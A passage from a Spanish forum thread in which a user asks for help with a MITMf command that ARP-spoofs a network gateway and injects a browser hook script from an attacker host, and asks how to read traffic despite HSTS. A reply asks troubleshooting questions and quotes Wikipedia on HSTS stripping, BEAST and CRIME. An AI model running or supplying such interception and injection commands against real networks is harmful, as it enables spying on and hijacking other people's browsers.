suelto el siguiente comando
mitmf --spoof --arp -i wlan0 --gateway 192.168.0.1 --inject --js-url http://192.168.0.42:3000/hook.js
y me dice:
Error: could not resolve Gateway's mac address
Alguien sabe a que puede deberse ?? y por cierto antes era facil capturar trafico ahora con es hsts me es casi imposible, alguien sabe como capturar ese trafico o leerlo ??
Gracias
CitarInglés => Error: could not resolve Gateway's mac address => Español => Error: no se pudo resolver la dirección mac de Gateway
¿Estás copiando y pegando exactamente? "No deberías, al menos que hagas correctamente los cambios de configuración" ¿Estás conectado a una red local? ¿Esa es la dirección IP del ruter (router) realmente? O ¿simplemente haz intentado resolver tu problema de acuerdo con la traducción?. Espero tu respuesta para que podamos aproximarnos a una solución ...
Done.
- DtxdF
HSTS Limitaciones
https://es.wikipedia.org/wiki/HTTP_Strict_Transport_Security
"La cabecera HSTS puede ser despojada por el atacante si esta es la primera visita del usuario."
"La solicitud inicial permanece sin protección contra ataques activos si utiliza un protocolo no seguro, como HTTP simple o si la URI de la solicitud inicial se obtuvo a través de un canal inseguro. Lo mismo se aplica a la primera petición después de que el período de actividad que se especifican en la política HSTS anunciada max-age (los sitios deben establecer un período de varios días o meses dependiendo de la actividad del usuario y su comportamiento). Google Chrome aborda esta limitación mediante la implementación de una "lista STS precargada".
Incluso con dicha "lista de STS precargado", HSTS no puede evitar los ataques avanzados como BEAST o CRIME (ambos fueron presentados por Juliano Rizzo y Thai Duong). Esto es porque los ataques son contra TLS/SSL en sí, y por lo tanto son ortogonales a la aplicación de la política HSTS."
BEAST
https://es.wikipedia.org/wiki/Transport_Layer_Security#Ataque_BEAST
CRIME
https://es.wikipedia.org/wiki/CRIME